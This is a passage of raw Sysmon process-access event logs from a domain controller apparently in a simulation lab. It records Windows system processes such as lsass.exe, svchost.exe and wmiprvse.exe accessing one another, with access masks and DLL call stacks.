C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.357{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.295{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.295{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009394Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.264{08A6967A-4288-6000-1000-000000009A01}11362240C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+15538|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+dc51|C:\Windows\system32\wbem\wbemcore.dll+2cfdf|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009393Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.232{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009392Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.185{08A6967A-4750-6000-0205-000000009A01}47884872C:\Windows\system32\csrss.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\winsrv.DLL+1ef0|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009391Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.170{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009390Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.170{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009389Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.170{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009388Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.170{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009387Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.170{08A6967A-4286-6000-0B00-000000009A01}852100C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009684Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009683Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009682Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009681Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009680Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.935{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.904{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4752-6000-0905-000000009A01}4424C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.889{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4752-6000-0905-000000009A01}4424C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.889{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4752-6000-0905-000000009A01}4424C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009671Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.779{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-0F00-000000009A01}1124C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+6260e|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000009670Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:54.779{08A6967A-4287-6000-0C00-000000009A01}5881168C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\lsm.dll+625bd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\S